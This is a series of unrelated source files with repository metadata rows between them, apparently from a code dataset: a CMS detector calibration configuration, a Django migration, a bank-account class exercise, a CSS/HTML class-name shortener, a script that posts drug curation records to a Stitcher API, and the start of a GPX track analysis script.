alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
debugV = cms.untracked.bool(False),
useCentreTIOffsets = cms.bool(False),
useDDD = cms.bool(False),
useGangedStripsInME1a = cms.bool(True),
useOnlyWiresInME1a = cms.bool(False),
useRealWireGeometry = cms.bool(True)
)
process.idealForDigiDTGeometry = cms.ESProducer("DTGeometryESModule",
alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
fromDDD = cms.bool(False)
)
process.idealForDigiTrackerGeometry = cms.ESProducer("TrackerDigiGeometryESModule",
alignmentsLabel = cms.string('fakeForIdeal'),
appendToDataLabel = cms.string('idealForDigi'),
applyAlignment = cms.bool(False),
fromDDD = cms.bool(False)
)
process.siPixelQualityESProducer = cms.ESProducer("SiPixelQualityESProducer",
ListOfRecordToMerge = cms.VPSet(
cms.PSet(
record = cms.string('SiPixelQualityFromDbRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiPixelDetVOffRcd'),
tag = cms.string('')
)
),
siPixelQualityLabel = cms.string('')
)
process.siStripBackPlaneCorrectionDepESProducer = cms.ESProducer("SiStripBackPlaneCorrectionDepESProducer",
BackPlaneCorrectionDeconvMode = cms.PSet(
label = cms.untracked.string('deconvolution'),
record = cms.string('SiStripBackPlaneCorrectionRcd')
),
BackPlaneCorrectionPeakMode = cms.PSet(
label = cms.untracked.string('peak'),
record = cms.string('SiStripBackPlaneCorrectionRcd')
),
LatencyRecord = cms.PSet(
label = cms.untracked.string(''),
record = cms.string('SiStripLatencyRcd')
)
)
process.siStripGainESProducer = cms.ESProducer("SiStripGainESProducer",
APVGain = cms.VPSet(
cms.PSet(
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.0),
Record = cms.string('SiStripApvGainRcd')
),
cms.PSet(
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.0),
Record = cms.string('SiStripApvGain2Rcd')
)
),
AutomaticNormalization = cms.bool(False),
appendToDataLabel = cms.string(''),
printDebug = cms.untracked.bool(False)
)
process.siStripLorentzAngleDepESProducer = cms.ESProducer("SiStripLorentzAngleDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string(''),
record = cms.string('SiStripLatencyRcd')
),
LorentzAngleDeconvMode = cms.PSet(
label = cms.untracked.string('deconvolution'),
record = cms.string('SiStripLorentzAngleRcd')
),
LorentzAnglePeakMode = cms.PSet(
label = cms.untracked.string('peak'),
record = cms.string('SiStripLorentzAngleRcd')
)
)
process.siStripQualityESProducer = cms.ESProducer("SiStripQualityESProducer",
ListOfRecordToMerge = cms.VPSet(
cms.PSet(
record = cms.string('SiStripDetVOffRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripDetCablingRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('RunInfoRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadChannelRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadFiberRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadModuleRcd'),
tag = cms.string('')
),
cms.PSet(
record = cms.string('SiStripBadStripRcd'),
tag = cms.string('')
)
),
PrintDebugOutput = cms.bool(False),
ReduceGranularity = cms.bool(False),
ThresholdForReducedGranularity = cms.double(0.3),
UseEmptyRunInfo = cms.bool(False),
appendToDataLabel = cms.string('')
)
process.sistripconn = cms.ESProducer("SiStripConnectivity")
process.stripCPEESProducer = cms.ESProducer("StripCPEESProducer",
ComponentName = cms.string('stripCPE'),
ComponentType = cms.string('SimpleStripCPE'),
parameters = cms.PSet(
)
)
process.trackerGeometryDB = cms.ESProducer("TrackerDigiGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
fromDDD = cms.bool(False)
)
process.trackerNumberingGeometryDB = cms.ESProducer("TrackerGeometricDetESModule",
appendToDataLabel = cms.string(''),
fromDDD = cms.bool(False)
)
process.trackerTopology = cms.ESProducer("TrackerTopologyEP",
appendToDataLabel = cms.string('')
)
process.GlobalTag = cms.ESSource("PoolDBESSource",
DBParameters = cms.PSet(
authenticationPath = cms.untracked.string(''),
authenticationSystem = cms.untracked.int32(0),
messageLevel = cms.untracked.int32(0),
security = cms.untracked.string('')
),
DumpStat = cms.untracked.bool(False),
ReconnectEachRun = cms.untracked.bool(False),
RefreshAlways = cms.untracked.bool(False),
RefreshEachRun = cms.untracked.bool(False),
RefreshOpenIOVs = cms.untracked.bool(False),
connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string(''),
pfnPostfix = cms.untracked.string(''),
pfnPrefix = cms.untracked.string(''),
snapshotTime = cms.string(''),
toGet = cms.VPSet()
)
process.HcalTimeSlewEP = cms.ESSource("HcalTimeSlewEP",
appendToDataLabel = cms.string('HBHE'),
timeSlewParametersM2 = cms.VPSet(
cms.PSet(
slope = cms.double(-3.178648),
tmax = cms.double(16.0),
tzero = cms.double(23.960177)
),
cms.PSet(
slope = cms.double(-1.5610227),
tmax = cms.double(10.0),
tzero = cms.double(11.977461)
),
cms.PSet(
slope = cms.double(-1.075824),
tmax = cms.double(6.25),
tzero = cms.double(9.109694)
)
),
timeSlewParametersM3 = cms.VPSet(
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(15.5),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-3.2),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(32.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
),
cms.PSet(
cap = cms.double(6.0),
tspar0 = cms.double(12.2999),
tspar0_siPM = cms.double(0.0),
tspar1 = cms.double(-2.19142),
tspar1_siPM = cms.double(0.0),
tspar2 = cms.double(0.0),
tspar2_siPM = cms.double(0.0)
)
)
)
process.HepPDTESSource = cms.ESSource("HepPDTESSource",
pdtFileName = cms.FileInPath('SimGeneral/HepPDTESSource/data/pythiaparticle.tbl')
)
process.eegeom = cms.ESSource("EmptyESSource",
firstValid = cms.vuint32(1),
iovIsRunNotTime = cms.bool(True),
recordName = cms.string('EcalMappingRcd')
)
process.es_hardcode = cms.ESSource("HcalHardcodeCalibrations",
GainWidthsForTrigPrims = cms.bool(False),
HBRecalibration = cms.bool(False),
HBmeanenergies = cms.FileInPath('CalibCalorimetry/HcalPlugins/data/meanenergiesHB.txt'),
HBreCalibCutoff = cms.double(20.0),
HERecalibration = cms.bool(False),
HEmeanenergies = cms.FileInPath('CalibCalorimetry/HcalPlugins/data/meanenergiesHE.txt'),
HEreCalibCutoff = cms.double(20.0),
HFRecalParameterBlock = cms.PSet(
HFdepthOneParameterA = cms.vdouble(
0.004123, 0.00602, 0.008201, 0.010489, 0.013379,
0.016997, 0.021464, 0.027371, 0.034195, 0.044807,
0.058939, 0.125497
),
HFdepthOneParameterB = cms.vdouble(
-4e-06, -2e-06, 0.0, 4e-06, 1.5e-05,
2.6e-05, 6.3e-05, 8.4e-05, 0.00016, 0.000107,
0.000425, 0.000209
),
HFdepthTwoParameterA = cms.vdouble(
0.002861, 0.004168, 0.0064, 0.008388, 0.011601,
0.014425, 0.018633, 0.023232, 0.028274, 0.035447,
0.051579, 0.086593
),
HFdepthTwoParameterB = cms.vdouble(
-2e-06, -0.0, -7e-06, -6e-06, -2e-06,
1e-06, 1.9e-05, 3.1e-05, 6.7e-05, 1.2e-05,
0.000157, -3e-06
)
),
HFRecalibration = cms.bool(False),
SiPMCharacteristics = cms.VPSet(
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(36000)
),
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(2500)
),
cms.PSet(
crosstalk = cms.double(0.17),
nonlin1 = cms.double(1.00985),
nonlin2 = cms.double(7.84089e-06),
nonlin3 = cms.double(2.86282e-10),
pixels = cms.int32(27370)
),
cms.PSet(
crosstalk = cms.double(0.196),
nonlin1 = cms.double(1.00546),
nonlin2 = cms.double(6.40239e-06),
nonlin3 = cms.double(1.27011e-10),
pixels = cms.int32(38018)
),
cms.PSet(
crosstalk = cms.double(0.17),
nonlin1 = cms.double(1.00985),
nonlin2 = cms.double(7.84089e-06),
nonlin3 = cms.double(2.86282e-10),
pixels = cms.int32(27370)
),
cms.PSet(
crosstalk = cms.double(0.196),
nonlin1 = cms.double(1.00546),
nonlin2 = cms.double(6.40239e-06),
nonlin3 = cms.double(1.27011e-10),
pixels = cms.int32(38018)
),
cms.PSet(
crosstalk = cms.double(0.0),
nonlin1 = cms.double(1.0),
nonlin2 = cms.double(0.0),
nonlin3 = cms.double(0.0),
pixels = cms.int32(0)
)
),
hb = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.19),
gainWidth = cms.vdouble(0.0),
mcShape = cms.int32(125),
pedestal = cms.double(3.285),
pedestalWidth = cms.double(0.809),
photoelectronsToAnalog = cms.double(0.3305),
qieOffset = cms.vdouble(-0.49, 1.8, 7.2, 37.9),
qieSlope = cms.vdouble(0.912, 0.917, 0.922, 0.923),
qieType = cms.int32(0),
recoShape = cms.int32(105),
zsThreshold = cms.int32(8)
),
hbUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.01, 0.015),
doRadiationDamage = cms.bool(True),
gain = cms.vdouble(0.0006252),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(206),
pedestal = cms.double(17.3),
pedestalWidth = cms.double(1.5),
photoelectronsToAnalog = cms.double(40.0),
qieOffset = cms.vdouble(0.0, 0.0, 0.0, 0.0),
qieSlope = cms.vdouble(0.05376, 0.05376, 0.05376, 0.05376),
qieType = cms.int32(2),
radiationDamage = cms.PSet(
depVsNeutrons = cms.vdouble(5.543e-10, 8.012e-10),
depVsTemp = cms.double(0.0631),
intlumiOffset = cms.double(150),
intlumiToNeutrons = cms.double(367000000.0),
temperatureBase = cms.double(20),
temperatureNew = cms.double(-5)
),
recoShape = cms.int32(206),
zsThreshold = cms.int32(16)
),
he = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.23),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(125),
pedestal = cms.double(3.163),
pedestalWidth = cms.double(0.9698),
photoelectronsToAnalog = cms.double(0.3305),
qieOffset = cms.vdouble(-0.38, 2.0, 7.6, 39.6),
qieSlope = cms.vdouble(0.912, 0.916, 0.92, 0.922),
qieType = cms.int32(0),
recoShape = cms.int32(105),
zsThreshold = cms.int32(9)
),
heUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.01, 0.015),
doRadiationDamage = cms.bool(True),
gain = cms.vdouble(0.0006252),
gainWidth = cms.vdouble(0),
mcShape = cms.int32(206),
pedestal = cms.double(17.3),
pedestalWidth = cms.double(1.5),
photoelectronsToAnalog = cms.double(40.0),
qieOffset = cms.vdouble(0.0, 0.0, 0.0, 0.0),
qieSlope = cms.vdouble(0.05376, 0.05376, 0.05376, 0.05376),
qieType = cms.int32(2),
radiationDamage = cms.PSet(
depVsNeutrons = cms.vdouble(5.543e-10, 8.012e-10),
depVsTemp = cms.double(0.0631),
intlumiOffset = cms.double(75),
intlumiToNeutrons = cms.double(29200000.0),
temperatureBase = cms.double(20),
temperatureNew = cms.double(5)
),
recoShape = cms.int32(206),
zsThreshold = cms.int32(16)
),
hf = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.14, 0.135),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(301),
pedestal = cms.double(9.354),
pedestalWidth = cms.double(2.516),
photoelectronsToAnalog = cms.double(0.0),
qieOffset = cms.vdouble(-0.87, 1.4, 7.8, -29.6),
qieSlope = cms.vdouble(0.359, 0.358, 0.36, 0.367),
qieType = cms.int32(0),
recoShape = cms.int32(301),
zsThreshold = cms.int32(-9999)
),
hfUpgrade = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.14, 0.135),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(301),
pedestal = cms.double(13.33),
pedestalWidth = cms.double(3.33),
photoelectronsToAnalog = cms.double(0.0),
qieOffset = cms.vdouble(0.0697, -0.7405, 12.38, -671.9),
qieSlope = cms.vdouble(0.297, 0.298, 0.298, 0.313),
qieType = cms.int32(1),
recoShape = cms.int32(301),
zsThreshold = cms.int32(-9999)
),
ho = cms.PSet(
darkCurrent = cms.vdouble(0.0),
doRadiationDamage = cms.bool(False),
gain = cms.vdouble(0.006, 0.0087),
gainWidth = cms.vdouble(0.0, 0.0),
mcShape = cms.int32(201),
pedestal = cms.double(12.06),
pedestalWidth = cms.double(0.6285),
photoelectronsToAnalog = cms.double(4.0),
qieOffset = cms.vdouble(-0.44, 1.4, 7.1, 38.5),
qieSlope = cms.vdouble(0.907, 0.915, 0.92, 0.921),
qieType = cms.int32(0),
recoShape = cms.int32(201),
zsThreshold = cms.int32(24)
),
iLumi = cms.double(-1.0),
killHE = cms.bool(False),
testHEPlan1 = cms.bool(False),
testHFQIE10 = cms.bool(False),
toGet = cms.untracked.vstring('GainWidths'),
useHBUpgrade = cms.bool(False),
useHEUpgrade = cms.bool(False),
useHFUpgrade = cms.bool(False),
useHOUpgrade = cms.bool(True),
useIeta18depth1 = cms.bool(True),
useLayer0Weight = cms.bool(False)
)
process.prefer("es_hardcode")
process.eventFilterHLT = cms.Sequence(process.hlt)
process.runAnalyzer = cms.Path(process.eventFilterHLT+process.analyzer)
| [
"parker.gardner95@gmail.com"
] | parker.gardner95@gmail.com |
23f82bb8c49c6bd705e2554aa96eaf4871d316d0 | afc95be6f7e4b4abb2a81abfe50e1e2d5653e05e | /CrawlManager/Crawls/migrations/0002_auto_20190119_0835.py | d8813714e52d47e63d780757df36733e449a06c4 | [] | no_license | iamzhijin/sf_spider | 316257e6e7821548686e0d66f234009429f87761 | c068d5d363839eb8e521e55abc6ca48d348a41a3 | refs/heads/master | 2023-01-28T12:06:27.011834 | 2019-02-27T09:50:11 | 2019-02-27T09:50:11 | 161,603,917 | 3 | 0 | null | 2022-12-07T04:13:47 | 2018-12-13T07:58:24 | Python | UTF-8 | Python | false | false | 443 | py | # Generated by Django 2.1.4 on 2019-01-19 08:35
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Crawls', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='crawls',
options={'ordering': ['-update_time']},
),
migrations.AlterModelTable(
name='crawls',
table='crawls',
),
]
| [
"liuyun@yscredit.com"
] | liuyun@yscredit.com |
197d28ad27055c99b501b8686cb22585cb12338c | aa5bf16e117b1b57e8090ab9b44ca51042aac2fc | /Prac-4/4.py | 77994f6bfd1c6be39e0c4737e72e2d9dafbbf2fd | [] | no_license | hardilundavia/extra | a3f7536911dd0d50ed276e0209e5ef0535e5ae80 | 1f82d35ee8801909516e97f2ffac6bc4f57d06d8 | refs/heads/master | 2020-06-28T20:22:14.246229 | 2019-12-23T11:50:38 | 2019-12-23T11:50:38 | 200,328,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | class BankAccount:
intrest_rate=4;
def set(self):
self.ac_no=int(input("Enter Account Number :"));
self.ac_name=input("Enter Account Name :");
self.balance=int(input("Enter Balance :"));
def show(self):
print("Ac_no\tAc_name\tBalance");
print(self.ac_no,"\t",self.ac_name,"\t",self.balance);
def deposite(self):
w=int(input("Enter Deposited Amount :"));
self.balance=self.balance+w;
self.show();
def withdraw(self):
w=int(input("Enter Withdraw Amount :"));
if self.balance < w:
print("Insufficient Balance");
return;
else:
self.balance=self.balance-w;
self.show();
def calc_intrest_rate(self):
self.balance = self.balance + (self.balance * self.intrest_rate)/100;
self.show();
b1=BankAccount();
b2=BankAccount();
b1.set();
b1.show();
b1.deposite();
b1.withdraw();
b1.calc_intrest_rate();
print("New Object b2");
b2.set();
b2.show();
b2.deposite();
b2.withdraw();
b2.calc_intrest_rate();
| [
"noreply@github.com"
] | hardilundavia.noreply@github.com |
dac12c063d52b36e99c387294e3b6371d00e6aef | 41fbec3acb666d7f39ad0640129e5de9eb1ba125 | /classid.py | 8ca98eb998e4b298d4ac6c96340d943143912ca4 | [] | no_license | SirBaaron/classid | 0190839f02bfa0b3d7269dc365394eca2b0ba2ca | b5875cfb681ba4744e47babbc8ff3a34ec667698 | refs/heads/master | 2021-01-17T11:37:01.738328 | 2016-08-17T15:38:10 | 2016-08-17T15:38:10 | 65,848,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,086 | py | #Written by Aaron Längert
import sys;
import re;
import json;
import string;
import codecs;
print("Written by Aaron Längert\n");
if(len(sys.argv)) == 1:
print("\nUsage: python " + sys.argv[0] + " <file> [file] [file]");
exit();
blacklist = [];
try:
file = open("classid-ignore.json");
try:
blacklist = json.load(file);
file.close();
print("Found classid-ignore.json file!");
except:
print("Oops.. something seems wrong with your classid-ignore file :/");
except:
print("You can exclude ids and classes by specifying them in classid-ignore.json. See the documentation for more information.");
values = {};
alphabet = "a";
counter = 0;
savepairs = False;
totalsave = 0;
def countup():
global counter;
global alphabet;
if counter == 51:
counter = 0;
else:
counter += 1;
if counter > 0:
alphabet = alphabet[:-1];
alphabet += string.ascii_letters[counter: counter + 1];
for fle in sys.argv[1:]:
if(fle == "--save-pairs"):
savepairs = True;
break;
typ = str(fle.rsplit(".", 1)[-1]);
if (typ == "html") or (typ == "js") or (typ == "css"):
try:
file = codecs.open(fle, "r+", "utf-8");
content = file.read();
except:
print("Can't open file " + fle + ": " + str(sys.exc_info()[0]));
break;
print("shortening " + fle + "..");
splitter = extractor = '.+';
if (typ == "html"):
mask = ['(?<=class=")[^"]+', '(?<=id=")[^"]+'];
splitter = '[^ ]+';
if (typ == "js"):
mask = ['classid\("[^")]+"\)'];
extractor = '(?<=").[^"]+';
if (typ == "css"):
mask = ['(?<=\.)-?[_a-zA-Z]+[_a-zA-Z0-9-]*(?!\s)*', '(?<=#)-?[_a-zA-Z]+[_a-zA-Z0-9-]*(?=[^}]*\{)'];
for regex in mask:
matches = re.finditer(regex, content, re.M);
sparing = 0;
for match in matches:
parts = re.finditer(splitter, match.group(0));
for classid in parts:
core = re.search(extractor, classid.group(0));
if (core.group(0) in blacklist) and (typ != "js"):
break;
elif core.group(0) in blacklist:
replacewith = core.group(0);
elif core.group(0) in values:
replacewith = values.get(core.group(0));
else:
replacewith = alphabet;
values[core.group(0)] = alphabet;
countup();
if typ == "js":
replacewith = "\"" + replacewith + "\"";
totalsave -= 9; #the chracters from classid() technically don't count
start = match.start(0) + classid.start(0) - sparing;
end = match.start(0) + classid.end(0) - sparing;
sparing += end - start - len(replacewith);
content = content[:start] + replacewith + content[end:];
totalsave += sparing;
file.seek(0);
file.write(content);
file.truncate();
file.close();
else:
print("Unknown file type: " + typ);
if savepairs:
file = open("classid-pairs.json", "w");
file.write(str(values).replace("'", "\""));
file.close();
print("Saved pairs of ids/classes to classid-pairs.json!");
print("\n\nDONE! Saved " + str(totalsave) + " characters (~" + str(totalsave / 1000) + "KB) in total"); | [
"noreply@github.com"
] | SirBaaron.noreply@github.com |
1c6b3570b0c358e73bb9eea4e802bdc09381cd82 | 41721635929286b2ef5a18de06591f9552912795 | /scripts/stitcher-curation/permuteCurations.py | 4d273b1b12784ee7a99af6ae1c8ef2949f8da2ba | [
"Apache-2.0"
] | permissive | ncats/stitcher | e46b64b9288f8c751d570f537c8d69f294d52527 | 31d67423060c1ea7e0b6ad25cb8ae83b6de25e4a | refs/heads/master | 2023-09-01T11:16:05.469707 | 2023-08-07T14:20:29 | 2023-08-07T14:20:29 | 217,080,716 | 12 | 8 | NOASSERTION | 2023-08-23T14:20:05 | 2019-10-23T14:40:42 | Java | UTF-8 | Python | false | false | 6,739 | py | #!/usr/bin/env python
import os
import sys
import cookielib
import urllib
import urllib2
import ssl
import json
import time
import argparse
site = "http://localhost:8080/"
cookies = cookielib.CookieJar()
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0, context=ctx),
urllib2.HTTPCookieProcessor(cookies))
opener.addheaders = [
('User-agent', ('Mozilla/4.0 (compatible; MSIE 6.0; '
'Windows NT 5.2; .NET CLR 1.1.4322)'))
]
def requestJson(uri):
try:
handle = opener.open(uri)
response = handle.read()
handle.close()
obj = json.loads(response)
return obj
except:
sys.stderr.write("failed: "+uri+"\n")
sys.stderr.flush()
time.sleep(5)
def applyCuration(sline):
obj = json.loads(sline[-1])
url = site[:-1]+obj['_uri']
for key in obj.keys():
if key[0] == "_": # do not post parameters created by API
del obj[key]
#print url, json.dumps(obj)
req = urllib2.Request(url, json.dumps(obj), {'Content-Type': 'application/json'})
try:
html = urllib2.urlopen(req, context=ctx)
sys.stderr.write(url+"\n")
resp = html.read()
sys.stderr.write(resp)
sys.stderr.write("\n")
r = json.loads(resp)
return r
except urllib2.HTTPError, e:
err = 'HTTP Error ERROR en el listado code => %s \n URL=> %s\n' % (e.code,url)
sys.stderr.write(err)
sys.exit()
except urllib2.URLError, e:
err = 'URL Error ERROR en el listado reason => %s \n URL=> %s\n' % (e.reason,url)
sys.stderr.write(err)
sys.exit()
return
def oldMain():
# check that the python version is correct (need 2)
if sys.version_info[0] > 2:
sys.stderr.write("Must be using Python 2! Aborting.\n")
sys.exit(1)
# check for arguments
args_p = argparse.ArgumentParser(description="Run Some Stitcher Tests")
args_p.add_argument('addr',
help="""a full Stitcher address OR
a shorthand: 'prod', 'dev', 'test' or 'local'""")
args_p.add_argument('--filename',
default="dbCurations.txt",
help="name of the file with curations to apply to stitcher database")
site_arg = args_p.parse_args().addr
filename = args_p.parse_args().filename
switcher = {
"prod": "https://stitcher.ncats.io/",
"dev": "https://stitcher-dev.ncats.io/",
"test": "https://stitcher-test.ncats.io/",
"local": "http://localhost:8080/"
}
if site_arg in switcher:
site = switcher[site_arg]
else:
site = site_arg
fp = open(filename, "r")
line = fp.readline()
while line != "":
applyCuration(line.split('\t'))
line = fp.readline()
fp.close()
example = """{"deltaId":1408,"nodeId":"KVS","nodeSource":"NCATS Pharmaceutical Collection, April 2012","node":368958,"operation":"add","jsonPath":"$['properties'][?(@['key']=='Synonyms' )]['value']","oldValue":null,"key":null,"value":"(R)-4-((E)-3-PHOSPHONOPROP-2-ENYL)PIPERAZINE-2-CARBOXYLIC ACID","stitches":"KVS","parentDataType":"object","dataType":"array","arrayIndex":null,"editor":"curator4 ","userName":"curator4","status":"approved","curationTimestamp":"12/15/2018","_ver":"1","_stitch":"KVS","_uri":"/api/stitches/latest/KVS/@update","_timestamp":1550001945101}"""
def getCuration(node, type, oldValue, value):
cur = dict()
operation = 'replace'
if value is None or value == '':
operation = 'remove'
elif oldValue is None or oldValue == '':
operation = 'add'
cur['stitches'] = node
cur['nodeSource'] = "DrugBank, July 2020"
cur['nodeId'] = node
cur['node'] = 368958
cur['jsonPath'] = "$['properties'][?(@['key']=='"+type+"' )]['value']"
cur['operation'] = operation
cur['oldValue'] = oldValue
cur['value'] = value
cur['_uri'] = "/api/stitches/latest/" + node + "/@testupdate"
#cur['key'] = None
#cur['parentDataType'] = "object"
#cur['dataType'] = "array"
#cur['arrayIndex'] = None
#cur['editor'] = "curator4 "
#cur['userName'] = "curator4"
#cur['status'] = "approved"
#cur['curationTimestamp'] = "12/15/2018"
return [json.dumps(cur)]
if __name__=="__main__":
uniis = dict()
names = dict()
for i in range(100, 150):
dbid = "DB%05d" % (i)
url = "http://localhost:8080/api/stitches/latest/" + dbid
print url
drug = requestJson(url)
if drug is not None:
for member in drug['sgroup']['members']:
if member['source'] == "DrugBank, July 2020" and member['id'] == dbid:
if 'stitches' in member:
if 'I_UNII' in member['stitches']:
if isinstance(member['stitches']['I_UNII'], list):
for unii in member['stitches']['I_UNII']:
uniis[dbid] = unii
else:
uniis[dbid] = member['stitches']['I_UNII']
if 'N_Name' in member['stitches']:
if isinstance(member['stitches']['N_Name'], list):
for name in member['stitches']['N_Name']:
names[dbid] = name
else:
names[dbid] = member['stitches']['N_Name']
print uniis
resps = dict()
errors = []
for unii1 in uniis.keys():
for unii2 in uniis.keys():
if unii1 != unii2 and uniis[unii1] != uniis[unii2]:
type = 'unii'
oldValue = uniis[unii1]
value = uniis[unii2]
curr = getCuration(unii1, type, oldValue, value)
print curr
resp = applyCuration(curr)
if 'statusMessage' in resp:
if resp['status'] == 'success':
if resp['statusMessage'] not in resps:
resps[resp['statusMessage']] = []
resps[resp['statusMessage']].append(unii1+":"+unii2)
else:
errors.append(resp['statusMessage'] + ":" + unii1 + ":" + unii2)
print unii1, unii2, resp
sys.exit()
print len(errors)
print errors
for key in resps.keys():
print key, len(resps[key]), resps[key]
| [
"southalln@mail.nih.gov"
] | southalln@mail.nih.gov |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809 | 3cc2f47de6d78d610a2887f92bfba150b2994888 | /application/forms/account.py | b709a49955ab50546f45efab620eda042081cd50 | [] | no_license | fengliu222/blogbar | c8a66df586187d0a16063e4536e76d155863fe17 | ff6e7182f000777112101eed12ae9e2ca4298d25 | refs/heads/master | 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | # coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
"""Form for signin"""
email = StringField('邮箱',
validators=[
DataRequired(),
Email()
],
description='Email')
password = PasswordField('密码',
validators=[DataRequired()],
description='Password')
def validate_email(self, field):
user = User.query.filter(User.email == self.email.data).first()
if not user:
raise ValueError("Account doesn't exist.")
def validate_password(self, field):
if self.email.data:
user = User.query.filter(User.email == self.email.data,
User.password == self.password.data).first()
if not user:
raise ValueError('Password cannot match the Email.')
else:
self.user = user | [
"hustlzp@qq.com"
] | hustlzp@qq.com |
13c88e880ccb3f89764d544534eea28042a19294 | 0f29dbe2a5fca038167236438548d1471dae5b50 | /recognition/align/config.py | 763fce8cbb8615c93a3639c208de7ea2a17c29f9 | [] | no_license | causehhc/faceRecognition | f6697d3e71c1af7cbcc443262938f3a898f15a41 | c8f383f04377543c699a6480407597165f4f700b | refs/heads/master | 2023-05-24T08:27:18.436404 | 2021-06-11T03:57:04 | 2021-06-11T03:57:04 | 372,358,012 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | # 最小脸大小设定
min_face = 20
# 生成hard_example的batch
batches = [2048, 256, 16]
# pent对图像缩小倍数
stride = 2
# 三个网络的阈值
thresh = [0.6, 0.7, 0.7]
# 最后测试选择的网络
test_mode = 'ONet'
# 测试图片放置位置
test_dir = '../data/dataSet/CASIA-WebFace/'
# 测试输出位置
out_path = '../data/dataSet/casia_mtcnn_182/'
# 一张图是否获取多张脸
detect_multiple_faces = False
# 输出图片大小
image_size = 182
| [
"1005694755@qq.com"
] | 1005694755@qq.com |
60d0ccdfddcc2d5a1734c0556773833430a4f48e | 1f9b62c9573c6268539a6a799e6ace5e58b9a6d4 | /trim_gpx.py | dcf4d70670ae26d92ce0d2a0ac09890910ace26d | [
"MIT"
] | permissive | jodysankey/scripts | 647ecc8e42c631c30d7603481d88bc1f2b039e1d | cec8fae0c1872bbd91b244775bee18d5db831581 | refs/heads/master | 2023-07-21T08:44:19.956073 | 2023-07-04T07:00:41 | 2023-07-04T07:00:41 | 236,669,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,175 | py | #!/bin/python3
"""Script to analyze two Navionics GPS tracks during crew overboard
manoeuvres, one from the boat, one from the 'crew'. Run with --help
to see the command line options."""
#==============================================================
# Copyright Jody M Sankey 2022
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENCE.md file for details.
#==============================================================
# AppliesTo: linux
# AppliesTo: client
# RemoveExtension: True
# PublicPermissions: True
#==============================================================
import argparse
import datetime as dt
import math as m
import os.path
import xml.etree.ElementTree as ElementTree
NS = {'': 'http://www.topografix.com/GPX/1/1'}
# Assorted conversion constants.
M_PER_DEGREE_LAT = 1852 * 60
FT_PER_M = 3.281
class Point:
"""A single point on a track segment."""
def __init__(self, xml_point):
xml_time = xml_point.find('time', NS)
self.time = dt.datetime.fromisoformat(xml_time.text[:-1]+'+00:00').astimezone()
self.lat = float(xml_point.attrib['lat'])
self.long = float(xml_point.attrib['lon'])
self.xml = xml_point
def __str__(self):
return f'{self.time} lat={self.lat}/long={self.long}'
def pos_string(self):
"""Returns a string describing the position of this point."""
return "{}°{:06.3f}'{} {}°{:06.3f}'{}".format(
int(abs(self.lat)), (abs(self.lat)%1)*60, 'N' if self.lat > 0 else 'S',
int(abs(self.long)), (abs(self.long)%1)*60, 'E' if self.long > 0 else 'W')
